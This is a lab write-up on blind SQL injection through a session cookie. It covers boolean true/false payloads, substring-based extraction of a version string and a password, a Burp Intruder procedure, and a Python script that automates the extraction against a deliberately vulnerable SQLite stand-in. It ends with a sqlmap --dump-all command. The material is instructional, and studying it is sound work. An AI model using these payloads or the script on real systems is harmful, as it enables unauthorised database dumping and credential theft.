Blind SQL injection
Failed SQL injection
Here sqlmap failed to find any injectable parameter in the GET/POST data of the request.

We can try injecting the cookie as well: the session value is often looked up in a query without escaping, so it can be injectable even when the form fields are not.

Detecting SQL injection
If the response length stays the same after we append a condition that is always true (for example ' and 1=1 #), the injected query is being processed without errors.
If the length changes after we append a condition that is always false (' and 1=2 #) or a deliberately broken statement, the response depends on the truth of what we inject.

This only changes the application's behaviour; it never returns data directly. That is what makes the injection blind: the data has to be inferred one true/false question at a time.
Substring function
SUBSTR(string, start, length) returns length characters of string beginning at position start (1-based).
' and substring('alexl', 1, 1) = 'a' #
We can walk through the string and match it one character at a time. This condition is true because the first character of 'alexl' is a, so the response should look like the unmodified request.

Extracting the version number

' and substring((select version()), 1, 1) = '8' #
The response keeps its normal length only if the first character of version() is 8, i.e. a MySQL 8.x server; other candidate digits can be tested the same way.
Finding a password
session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username='jessamy'), 1, 1) = 'b' #
Send this request to Burp Intruder, mark the compared character ('b') as the payload position and load a list of letters, digits and symbols; the payload whose response length matches the baseline is the character at that position.

Here the first character is Z. Change the start offset from 1 to 2 and repeat for each position until no candidate matches, which means the end of the string has been reached.
Caveat: MySQL's default collations compare case-insensitively, so 'z' and 'Z' both match; compare with BINARY (= BINARY 'Z') or ascii() to recover the exact case.
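The Intruder procedure above, automated, as an added example that is not the lab's or the page's own code. Because it has to run offline, it uses an in-memory SQLite database as a stand-in for the vulnerable application: the table and column names (injection0x02, username, password) come from the page, while the sessions table, the cookie lookup query, the response texts and the sample password are constructed assumptions. SQLite differences from the MySQL payloads on the page: substr instead of substring, '-- ' instead of '#', and sqlite_version() instead of version().

```python
import sqlite3
import string

# Constructed stand-in for the lab target (assumption: the real app's schema,
# pages and session handling are not shown on the page).
SESSION_ID = "6967cabefd763ac1a1a88e11159957db"
CHARSET = string.ascii_letters + string.digits + "_-!@#$%^&*."  # no quote characters


def build_db():
    """Constructed target database; the password is arbitrary sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE injection0x02 (username TEXT, password TEXT);
        INSERT INTO injection0x02 VALUES ('jessamy', 'Zebra9');
        CREATE TABLE sessions (session TEXT, username TEXT);
        INSERT INTO sessions VALUES ('6967cabefd763ac1a1a88e11159957db', 'alex');
        """
    )
    return db


def vulnerable_page(db, cookie):
    """Deliberately vulnerable: the cookie value is concatenated straight into SQL."""
    sql = f"SELECT username FROM sessions WHERE session='{cookie}'"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return "Something went wrong"                 # syntax error: different length
    if rows:
        return f"Welcome back, {rows[0][0]}" + " " * 200  # long 'logged in' page
    return "Please log in"                            # query ran, but matched no row


def oracle(db, condition):
    """Boolean oracle: True when the injected condition keeps the baseline response length."""
    baseline = len(vulnerable_page(db, SESSION_ID))
    injected = f"{SESSION_ID}' AND ({condition}) -- "  # SQLite comment; the page uses MySQL's #
    return len(vulnerable_page(db, injected)) == baseline


def find_length(db, subquery, max_len=64):
    """Binary search on length() instead of one request per candidate length."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(db, subquery):
    """Recover a string one position at a time, as the Intruder run on the page does."""
    length = find_length(db, subquery)
    result = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(db, f"substr(({subquery}), {pos}, 1) = '{ch}'"):
                result += ch
                break
        else:
            raise ValueError(f"position {pos}: no character in CHARSET matched")
    return result


def extract_password(db, username="jessamy"):
    return extract(db, f"SELECT password FROM injection0x02 WHERE username='{username}'")


if __name__ == "__main__":
    db = build_db()
    print("oracle sanity check:", oracle(db, "1=1"), oracle(db, "1=2"))
    print("version starts with 3:", oracle(db, "substr(sqlite_version(), 1, 1) = '3'"))
    print("password:", extract_password(db))
```

Against the real lab, vulnerable_page would be replaced by an HTTP request carrying the cookie, and the three SQLite spellings swapped back for the MySQL ones shown on the page. The length search is there because the number of requests is what limits blind extraction in practice: a binary search on length() plus one request per candidate character is far cheaper than walking every position with every payload.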

sqlmap
┌──(kali㉿kali)-[~/Downloads/labs]
└─$ sqlmap -r req2.txt --level=2 -D peh-labs -T auth0x02 --dump-all
--level=2 is required here: sqlmap only tests the Cookie header from level 2 upwards, so at the default level 1 the injectable session cookie is skipped.